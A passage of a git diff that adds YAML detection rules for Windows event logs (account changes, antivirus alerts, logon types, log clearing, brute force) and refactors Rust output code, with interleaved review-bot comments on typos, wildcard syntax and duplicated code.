from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Image + from: Image + to: Event.EventData.Image + - name: Target File Name + from: TargetFilename + to: Event.EventData.TargetFilename - name: Suspicious Registry Event timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 13 - Event.System.Provider: Microsoft-Windows-Sysmon + EventID: 13 + Provider: Microsoft-Windows-Sysmon fields: - Computer: Event.System.Computer - Details: Event.EventData.Details - EventID: Event.System.EventID - Image: Event.EventData.Image - TargetObject: Event.EventData.TargetObject - default: - - EventID - - Computer - - Details - - TargetObject + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Image + from: Image + to: Event.EventData.Image + - name: Details + from: Details + to: Event.EventData.Details + - name: Target Object + from: TargetObject + to: Event.EventData.TargetObject - name: Suspicious Service Installed timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 7045 - Event.System.Provider: Service Control Manager + EventID: 7045 + Provider: Service Control Manager fields: - CommandLine: Event.EventData.ImagePath - Computer: Event.System.Computer - EventID: Event.System.EventID - ServiceName: Event.EventData.ServiceName - default: - - EventID - - Computer - - CommandLine - - ServiceName + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Service + from: ServiceName + to: Event.EventData.ServiceName + # TODO: Can someone check if this is a typo...? 
+ - name: Command Line + from: CommandLine + to: Event.EventData.ImagePath - name: Suspicious Command Line timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 4688 - Event.System.Provider: Microsoft-Windows-Security-Auditing + EventID: 4688 + Provider: Microsoft-Windows-Security-Auditing fields: - CommandLine: Event.EventData.CommandLine - Computer: Event.System.Computer - EventID: Event.System.EventID - Image: Event.EventData.NewProcessName - UserName: Event.EventData.SubjectUserName - default: - - EventID - - Computer - - CommandLine - - Image + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: User + from: UserName + to: Event.EventData.SubjectUserName + # TODO: Can someone check if this is a typo...? + - name: Process + from: Image + to: Event.EventData.NewProcessName + - name: Command Line + from: CommandLine + to: Event.EventData.CommandLine - name: Suspicious Powershell ScriptBlock timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 4104 - Event.System.Provider: Microsoft-Windows-PowerShell + EventID: 4104 + Provider: Microsoft-Windows-PowerShell fields: - Computer: Event.System.Computer - EventID: Event.System.EventID - ScriptBlockText: Event.EventData.ScriptBlockText - default: - - EventID - - Computer - - ScriptBlockText + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: Script Block + from: ScriptBlockText + to: Event.EventData.ScriptBlockText - name: Suspicious Scheduled Task Created timestamp: Event.System.TimeCreated filter: - - Event.System.EventID: 4698 - Event.System.Provider: Microsoft-Windows-Security-Auditing + EventID: 4698 + Provider: Microsoft-Windows-Security-Auditing fields: - CommandLine: 
Event.EventData.TaskContent - Computer: Event.System.Computer - EventID: Event.System.EventID - UserName: Event.EventData.SubjectUserName - default: - - EventID - - Computer - - CommandLine - - UserName + - from: Provider + to: Event.System.Provider + visible: false + - name: Event ID + from: EventID + to: Event.System.EventID + - name: Computer + from: Computer + to: Event.System.Computer + - name: User + from: UserName + to: Event.EventData.SubjectUserName + # TODO: Can someone check if this is a typo...? + - name: Command Line + from: CommandLine + to: Event.EventData.TaskContent diff --git a/rules/account_tampering/new_user_created.yml b/rules/account_tampering/new_user_created.yml new file mode 100644 index 00000000..b819c13d --- /dev/null +++ b/rules/account_tampering/new_user_created.yml @@ -0,0 +1,27 @@ +--- +title: New User Created +group: Account Tampering +description: A new user was created. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: User SID + to: Event.EventData.TargetSid + + +filter: + Event.System.EventID: 4720 diff --git a/rules/account_tampering/user_added_to_global_group.yml b/rules/account_tampering/user_added_to_global_group.yml new file mode 100644 index 00000000..ab3c63cd --- /dev/null +++ b/rules/account_tampering/user_added_to_global_group.yml 
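Review bot: The three `# TODO: Can someone check if this is a typo...?` comments (above the 7045 `Command Line`, the 4688 `Process` and the 4698 `Command Line` entries) leave the reader unsure whether `ImagePath`, `NewProcessName` and `TaskContent` are mistakes, while they look like deliberate aliases: Sigma rules are written against the generic `Image`/`CommandLine` names and these entries translate them to the field the Security/System log actually carries. If that is the intent, replace each TODO with a statement of it, e.g. `# Deliberate alias: Sigma rules use CommandLine/Image for this event; the log stores the value under the field named in 'to'`. The hunk also drops every `default:` list, so which columns are printed now presumably follows from `visible: false` alone; a one-line comment at the top of `fields:` saying so would save the next editor from re-adding defaults.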
@@ -0,0 +1,34 @@ +--- +title: User Added to Global Group +group: Account Tampering +description: A user was added to an global group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4728 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/rules/account_tampering/user_added_to_local_group.yml b/rules/account_tampering/user_added_to_local_group.yml new file mode 100644 index 00000000..e781bba3 --- /dev/null +++ b/rules/account_tampering/user_added_to_local_group.yml @@ -0,0 +1,34 @@ +--- +title: User Added to Local Group +group: Account Tampering +description: A user was added to a local group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4732 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/rules/account_tampering/user_added_to_universal_group.yml b/rules/account_tampering/user_added_to_universal_group.yml new file mode 100644 index 00000000..0d210df6 --- /dev/null +++ b/rules/account_tampering/user_added_to_universal_group.yml 
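Review bot: The `admin_or_rdp` exclusion (`Event.EventData.TargetUserName: [Admin, Remote Desktop]`) in user_added_to_global_group, repeated in user_added_to_local_group on this line and user_added_to_universal_group at the next hunk, has an unclear effect either way. If tau-engine matches these values exactly (they carry no wildcard, unlike the `$*` used in the logon rules) they never equal the real group names such as "Administrators" or "Remote Desktop Users" and the exclusion is inert; if they are treated as prefixes, the rule suppresses precisely the group additions a responder most wants to see. Please either drop the `not admin_or_rdp` clause or add a comment stating what it is meant to exclude and why. Two smaller points: the filter key is named `global` in the local (4732) and universal (4756) rules too, and `description: A user was added to an global group.` should read `A user was added to a global group.`.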
@@ -0,0 +1,34 @@ +--- +title: User Added to Universal Group +group: Account Tampering +description: A user was added to a universal group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4756 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/rules/antivirus/f-secure.yml b/rules/antivirus/f-secure.yml new file mode 100644 index 00000000..4eee3ec2 --- /dev/null +++ b/rules/antivirus/f-secure.yml @@ -0,0 +1,41 @@ +--- +title: F-Secure Antivirus +group: Antivirus +description: Events from F-Secure's Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: Threat Name + from: threat_name + container: + field: Event.EventData.rv + format: json + to: iname + - name: Threat Path + from: threat_path + container: + field: Event.EventData.rv + format: json + to: obj.ref + - name: SHA1 + from: sha1 + container: + field: Event.EventData.rv + format: json + to: obj.sha1 + + +filter: + Event.System.Provider: F-Secure Ultralight SDK diff --git a/rules/antivirus/kaspersky.yml b/rules/antivirus/kaspersky.yml new file mode 100644 index 00000000..4a56c7ce --- /dev/null +++ b/rules/antivirus/kaspersky.yml 
@@ -0,0 +1,29 @@ +--- +title: Kaspersky Antivirus +group: Antivirus +description: Events from Kaspersky's Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: Threat Name + to: Event.EventData.Data[1] + - name: Threat Path + to: Event.EventData.Data[0] + + +filter: + Event.System.Provider: + - Real-time file protection + - OnDemandScan diff --git a/rules/antivirus/sophos.yml b/rules/antivirus/sophos.yml new file mode 100644 index 00000000..58fb3742 --- /dev/null +++ b/rules/antivirus/sophos.yml @@ -0,0 +1,29 @@ +--- +title: Sophos Antivirus +group: Antivirus +description: Events from Sophos' Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: Threat Type + to: Event.EventData.Data[0] + - name: Threat Name + to: Event.EventData.Data[2] + - name: Threat Path + to: Event.EventData.Data[1] + + +filter: + Event.System.Provider: Sophos Anti-Virus diff --git a/rules/antivirus/windows_defender.yml b/rules/antivirus/windows_defender.yml new file mode 100644 index 00000000..5125b1b4 --- /dev/null +++ b/rules/antivirus/windows_defender.yml @@ -0,0 +1,29 @@ +--- +title: Windows Defender +group: Antivirus +description: Events from Windows Defender. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.Detection User + - name: Threat Name + to: Event.EventData.Threat Name + - name: Threat Path + to: Event.EventData.Path + + +filter: + Event.System.Provider: Microsoft-Windows-Windows Defender 
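Review bot: The filters in windows_defender, sophos and kaspersky here (and f-secure at the previous hunk) select on `Event.System.Provider` alone, so every event the provider writes — signature updates, service state changes, scan summaries — becomes a detection row whose Threat Name/Path cells are empty. Narrowing each filter to the detection event IDs (for Defender, presumably the malware-detected/action-taken events, 1116/1117; please confirm for the other vendors) would keep the rule aligned with its `description`. The positional `Event.EventData.Data[0]`/`Data[1]`/`Data[2]` paths in the Kaspersky and Sophos rules are tied to a specific product version's event layout, so a comment naming the version they were checked against would help, e.g. `# Data[] ordering verified against <product version placeholder>`. The Defender paths contain spaces (`Event.EventData.Detection User`, `Event.EventData.Threat Name`); confirm the path parser accepts an unquoted space as part of a key rather than treating it as a separator.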
diff --git a/rules/lateral_movement/batch_logon.yml b/rules/lateral_movement/batch_logon.yml new file mode 100644 index 00000000..fe0175eb --- /dev/null +++ b/rules/lateral_movement/batch_logon.yml @@ -0,0 +1,39 @@ +--- +title: Batch Logon +group: Lateral Movement +description: An Batch based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: batch and not local_ips_or_machine_accounts + + batch: + Event.System.EventID: 4624 + Event.EventData.LogonType: 4 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/interactive_logon.yml b/rules/lateral_movement/interactive_logon.yml new file mode 100644 index 00000000..b83dfab0 --- /dev/null +++ b/rules/lateral_movement/interactive_logon.yml @@ -0,0 +1,39 @@ +--- +title: Interactive Logon +group: Lateral Movement +description: An Interactive based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: interactive and not local_ips_or_machine_accounts + + interactive: + Event.System.EventID: 4624 + Event.EventData.LogonType: 2 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* 
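Review bot: The machine-account exclusion `- Event.EventData.TargetUserName: $*` in batch_logon and interactive_logon on this line (and in network, rdp, service and unlock at the next two hunks) appears to have the wildcard on the wrong side: machine accounts are named `HOSTNAME$`, so if `*` is a trailing wildcard this pattern only matches names that begin with `$` and the exclusion never fires. If tau-engine's syntax is as I assume, the value should be `- Event.EventData.TargetUserName: '*$'` (quoted, since a bare `*` is a YAML alias marker) — please confirm against the engine's wildcard rules. Separately, the descriptions read `An Batch based logon.`, `An Network based logon` and `An Service based logon`; `A batch-based logon.` etc. with a trailing period would match the RDP/Interactive phrasing.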
diff --git a/rules/lateral_movement/network_logon.yml b/rules/lateral_movement/network_logon.yml new file mode 100644 index 00000000..51fbe425 --- /dev/null +++ b/rules/lateral_movement/network_logon.yml @@ -0,0 +1,39 @@ +--- +title: Network Logon +group: Lateral Movement +description: An Network based logon +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: network and not local_ips_or_machine_accounts + + network: + Event.System.EventID: 4624 + Event.EventData.LogonType: 3 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/rdp_logon.yml b/rules/lateral_movement/rdp_logon.yml new file mode 100644 index 00000000..ecdcfa6c --- /dev/null +++ b/rules/lateral_movement/rdp_logon.yml @@ -0,0 +1,39 @@ +--- +title: RDP Logon +group: Lateral Movement +description: An RDP based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: rdp and not local_ips_or_machine_accounts + + rdp: + Event.System.EventID: 4624 + Event.EventData.LogonType: 10 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* 
diff --git a/rules/lateral_movement/service_logon.yml b/rules/lateral_movement/service_logon.yml new file mode 100644 index 00000000..3823b34c --- /dev/null +++ b/rules/lateral_movement/service_logon.yml @@ -0,0 +1,39 @@ +--- +title: Service Logon +group: Lateral Movement +description: An Service based logon +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: service and not local_ips_or_machine_accounts + + service: + Event.System.EventID: 4624 + Event.EventData.LogonType: 5 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/unlock_logon.yml b/rules/lateral_movement/unlock_logon.yml new file mode 100644 index 00000000..50b74080 --- /dev/null +++ b/rules/lateral_movement/unlock_logon.yml @@ -0,0 +1,38 @@ +--- +title: Unlock Logon +group: Lateral Movement +description: An Unlock based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: unlock and not local_ips_or_machine_accounts + + unlock: + Event.System.EventID: 4624 + Event.EventData.LogonType: 7 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* 
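Review bot: unlock_logon.yml omits `timestamp: Event.System.TimeCreated`, which every other rule in this commit sets between `status:` and `fields:`; without it the hit's timestamp (used for the table/CSV ordering in cli.rs) presumably falls back to whatever the loader does for a missing key, and this looks like an oversight rather than a choice. Add `timestamp: Event.System.TimeCreated` after `status: stable`. The description `An Unlock based logon.` should read `An unlock-based logon.`.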
diff --git a/rules/log_tampering/security_audit_log_was_cleared.yml b/rules/log_tampering/security_audit_log_was_cleared.yml new file mode 100644 index 00000000..9581ff8e --- /dev/null +++ b/rules/log_tampering/security_audit_log_was_cleared.yml @@ -0,0 +1,30 @@ +--- +title: Security Audit Logs Cleared +group: Log Tampering +description: The security audit logs were cleared. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.UserData.LogFileCleared.SubjectUserName + + +filter: + condition: security_log_cleared and not empty + + security_log_cleared: + Event.System.EventID: 1102 + empty: + Event.UserData.LogFileCleared.SubjectUserName: diff --git a/rules/log_tampering/system_log_was_cleared.yml b/rules/log_tampering/system_log_was_cleared.yml new file mode 100644 index 00000000..6d52a275 --- /dev/null +++ b/rules/log_tampering/system_log_was_cleared.yml @@ -0,0 +1,30 @@ +--- +title: System Logs Cleared +group: Log Tampering +description: The system logs were cleared. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.UserData.LogFileCleared.SubjectUserName + + +filter: + condition: system_log_cleared and not empty + + system_log_cleared: + Event.System.EventID: 104 + empty: + Event.UserData.LogFileCleared.SubjectUserName: diff --git a/rules/login_attacks/account_brute_force.yml b/rules/login_attacks/account_brute_force.yml new file mode 100644 index 00000000..9935fe9e --- /dev/null +++ b/rules/login_attacks/account_brute_force.yml 
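Review bot: The `not empty` clause in both log-tampering rules (`empty:` matching a null `Event.UserData.LogFileCleared.SubjectUserName`) discards clear events that carry no subject, which is a surprising choice for a tampering rule and is not explained; add a comment above `empty:` stating why a subject-less clear is not worth reporting, or drop the clause. For system_log_was_cleared, event 104 is, as far as I recall, written for any non-Security channel that is cleared, not only the System log, so the title and description overstate what the filter selects; surfacing the channel name from the event's `LogFileCleared` data as a field would make the row self-explanatory (please verify the exact field name before adding it).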
@@ -0,0 +1,34 @@ +--- +title: Account Brute Force +group: Login Attacks +description: An account that appears to have been brute forced. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: User + to: Event.EventData.TargetUserName + + +filter: + condition: failed_logons and not empty + + failed_logons: + Event.System.EventID: 4625 + empty: + Event.EventData.TargetUserName: 'null' + + +aggregate: + count: '>5' + fields: + - Event.EventData.TargetUserName diff --git a/rules/service_tampering/event_log.yml b/rules/service_tampering/event_log.yml new file mode 100644 index 00000000..c4da7a36 --- /dev/null +++ b/rules/service_tampering/event_log.yml @@ -0,0 +1,29 @@ +--- +title: Windows Event Log Stopped +group: Service Tampering +description: The Windows Event Log service has been stopped. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Computer + to: Event.System.Computer + - name: Service Name + to: Event.EventData.param1 + - name: Action + to: Event.EventData.param2 + + +filter: + Event.System.EventID: 7040 + Event.EventData.param1: Windows Event Log + Event.EventData.param2: disabled diff --git a/src/cli.rs b/src/cli.rs index 099e049e..e701bf2b 100644 --- a/src/cli.rs +++ b/src/cli.rs 
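Review bot: account_brute_force represents an absent user name as the string `'null'` (`empty: Event.EventData.TargetUserName: 'null'`), whereas the log_tampering rules in the previous hunk use a YAML null for the same idea; only one of these can be what the engine treats as "missing", so confirm which and use it in both places. The aggregate keys on `Event.EventData.TargetUserName` alone and the fields list has no `Computer` or source address, so six failures for the same name spread across many hosts collapse into one row with nothing to pivot on; adding `- name: Computer` / `to: Event.System.Computer` and `- name: IP Address` / `to: Event.EventData.IpAddress` (both already used by the logon rules) would help. The `count: '>5'` threshold also deserves a comment on how it was chosen, e.g. `# more than five 4625s for one account in the input set`.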
@@ -1,14 +1,20 @@ -use std::collections::HashMap; +use std::collections::{HashMap, HashSet}; use std::fs; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; use chrono_tz::Tz; use indicatif::{ProgressBar, ProgressDrawTarget, ProgressStyle}; use prettytable::{cell, format, Row, Table}; +use serde::Serialize; use tau_engine::Document; +use uuid::Uuid; -use crate::hunt::{Detection, Detections, Kind, Mapping}; -use crate::rule::Rule; +use crate::file::Kind as FileKind; +use crate::hunt::{Detections, Group, Hunt, Kind, Mapper, Mapping}; +use crate::rule::{ + chainsaw::{Level, Rule as Chainsaw, Status}, + Kind as RuleKind, +}; use crate::write::WRITER; #[cfg(not(windows))] @@ -68,10 +74,13 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String data } +// FIXME: All the table stuff needs a little think due to the field complexities... + pub fn print_detections( detections: &[Detections], + hunts: &[Hunt], mappings: &[Mapping], - rules: &[Rule], + rules: &HashMap>, column_width: u32, full: bool, local: bool, 
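Review bot: The new `hunts` and `rules` parameters of `print_detections` are undocumented, and the `// FIXME: All the table stuff needs a little think due to the field complexities...` above the signature does not tell a caller what shape `rules` must have (the lookup in the next hunk flattens `rules.values()` and reads `r.0`/`r.1`, so it appears to be keyed by rule kind with `(id, rule)` pairs as values). Replace the FIXME with a doc comment on the function that names what `detections`, `hunts`, `mappings` and `rules` are and how `rules` is keyed, keeping the open design question as a separate `// TODO`. The function also now takes four collections plus three positional `bool`/`u32` options; grouping the display options into a small struct would make call sites readable, but that can be a follow-up. `print_detections`' body continues past this hunk.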
@@ -96,25 +105,38 @@ pub fn print_detections( .padding(1, 1) .build(); - let mappings: HashMap<_, HashMap<_, _>> = mappings - .iter() - .map(|m| (&m.name, m.groups.iter().map(|g| (&g.name, g)).collect())) - .collect(); - let rules: HashMap<_, _> = rules.iter().map(|r| (&r.tag, r)).collect(); + // Build headers + let mut headers: HashMap<&String, (Vec<&String>, HashSet<&String>)> = HashMap::new(); + for hunt in hunts { + let headers = headers + .entry(&hunt.group) + .or_insert((vec![], HashSet::new())); + for header in &hunt.headers { + if !headers.1.contains(&header) { + (*headers).0.push(&header); + (*headers).1.insert(&header); + } + } + } + // Build lookups + let mut groups: HashMap<&Uuid, &Group> = HashMap::new(); + for mapping in mappings { + for group in &mapping.groups { + groups.insert(&group.id, group); + } + } + let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); + let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); - // Do a single unfold... - let mut grouped: HashMap< - (&Option, &String), - Vec<(&NaiveDateTime, &Kind, Vec<&String>)>, - > = HashMap::new(); + // Do a single unfold... >> + let mut grouped: HashMap<&String, Vec<(&NaiveDateTime, &Kind, Vec<(&Uuid, &Uuid)>)>> = + HashMap::new(); for detection in detections { - let mut tags: HashMap<(&Option, &String), (&NaiveDateTime, Vec<&String>)> = - HashMap::new(); + let mut tags: HashMap<&String, (&NaiveDateTime, Vec<(&Uuid, &Uuid)>)> = HashMap::new(); for hit in &detection.hits { - let tags = tags - .entry((&hit.mapping, &hit.group)) - .or_insert((&hit.timestamp, vec![])); - (*tags).1.push(&hit.tag); + let group = &hunts.get(&hit.hunt).expect("could not get hunt").group; + let tags = tags.entry(&group).or_insert((&hit.timestamp, vec![])); + (*tags).1.push((&hit.hunt, &hit.rule)); } for (k, v) in tags { let grouped = grouped.entry(k).or_insert(vec![]); 
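Review bot: The "Build headers" and "Build lookups" sections added here are repeated line for line in `print_csv` (hunk at `@@ -231,23 +290,37 @@`), so any fix to the de-duplication or to the id lookups has to be made twice. Extracting them into private helpers that both functions call would remove the duplication, and the `contains`-then-`insert` pair can use `HashSet::insert`'s return value. `print_detections` continues outside this hunk.

```rust
/// Per-group column headers in first-seen order, de-duplicated across hunts.
fn group_headers(hunts: &[Hunt]) -> HashMap<&String, Vec<&String>> {
    let mut headers: HashMap<&String, (Vec<&String>, HashSet<&String>)> = HashMap::new();
    for hunt in hunts {
        let entry = headers
            .entry(&hunt.group)
            .or_insert((vec![], HashSet::new()));
        for header in &hunt.headers {
            // insert() is false when the header was already seen for this group
            if entry.1.insert(header) {
                entry.0.push(header);
            }
        }
    }
    headers.into_iter().map(|(k, (v, _))| (k, v)).collect()
}

/// Group lookup by id, built from every mapping's groups.
fn group_lookup(mappings: &[Mapping]) -> HashMap<&Uuid, &Group> {
    mappings
        .iter()
        .flat_map(|m| m.groups.iter().map(|g| (&g.id, g)))
        .collect()
}

// … unchanged: the single unfold over detections …
```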
@@ -129,98 +151,135 @@ pub fn print_detections( grouped.sort_by(|x, y| x.0.cmp(&y.0)); let mut table = Table::new(); table.set_format(format); - let (mapping, group) = key; - if let Some(mapping) = mapping { - if let Some(groups) = mappings.get(mapping) { - let group = groups.get(&group).expect("could not get group!"); - let mut header = vec![ - cell!("timestamp").style_spec("c"), - cell!("detections").style_spec("c"), - ]; - if let Some(default) = group.default.as_ref() { - for field in default { - header.push(cell!(field).style_spec("c")); - } - } else { - header.push(cell!("data").style_spec("c")); + if let Some((headers, _)) = headers.remove(key) { + let mut cells = vec![ + cell!("timestamp").style_spec("c"), + cell!("detections").style_spec("c"), + ]; + if headers.is_empty() { + cells.push(cell!("data").style_spec("c")); + } else { + for header in &headers { + cells.push(cell!(header).style_spec("c")); } - table.add_row(Row::new(header)); - for (timestamp, kind, mut tags) in grouped { - tags.sort(); - let localised = if let Some(timezone) = timezone { - timezone - .from_local_datetime(timestamp) - .single() - .expect("failed to localise timestamp") - .to_rfc3339() - } else if local { - Utc.from_local_datetime(timestamp) - .single() - .expect("failed to localise timestamp") - .to_rfc3339() - } else { - DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() - }; - let mut cells = vec![cell!(localised)]; - if metadata { - let mut table = Table::new(); + } + table.add_row(Row::new(cells)); + for (timestamp, kind, ids) in grouped { + // FIXME: Sort rules + //ids.sort(); + let localised = if let Some(timezone) = timezone { + timezone + .from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + }; + let mut cells = 
vec![cell!(localised)]; + if metadata { + let mut table = Table::new(); + table.add_row(Row::new(vec![ + cell!("name").style_spec("c"), + cell!("authors").style_spec("c"), + cell!("level").style_spec("c"), + cell!("status").style_spec("c"), + ])); + for (_, rid) in &ids { + let rule = rules.get(rid).expect("could not get rule"); table.add_row(Row::new(vec![ - cell!("name").style_spec("c"), - cell!("authors").style_spec("c"), - cell!("level").style_spec("c"), - cell!("status").style_spec("c"), + cell!(rule.name), + cell!(rule.authors.join("\n")), + cell!(rule.level), + cell!(rule.status), ])); - for tag in tags { - let rule = rules.get(&tag).expect("could not get rule"); - table.add_row(Row::new(vec![ - cell!(tag), - cell!(rule.authors.join("\n")), - cell!(rule.level), - cell!(rule.status), - ])); - } - cells.push(cell!(table)); - } else { - cells.push(cell!(tags - .iter() - .map(|tag| format!("{} {}", RULE_PREFIX, tag.as_str())) - .collect::>() - .join("\n"))); } - let document = match kind { - Kind::Individual { document } => document, + cells.push(cell!(table)); + } else { + cells.push(cell!(ids + .iter() + .map(|(_, rid)| format!( + "{} {}", + RULE_PREFIX, + rules.get(rid).expect("could not get rule").name.as_str() + )) + .collect::>() + .join("\n"))); + } + let document = match kind { + Kind::Individual { document } => document, + Kind::Aggregate { documents } => { + documents.first().expect("could not get document") + } + }; + if headers.is_empty() { + let json = serde_json::to_string(&document.data) + .expect("could not serialise document"); + cells.push(cell!(format_field_length(&json, false, column_width))); + } else { + // This is really complicated, we could land in the same group but be from + // different hunts that have different headers, that also could even overlap... + // Because we group we won't be able to reliably handle clashes. 
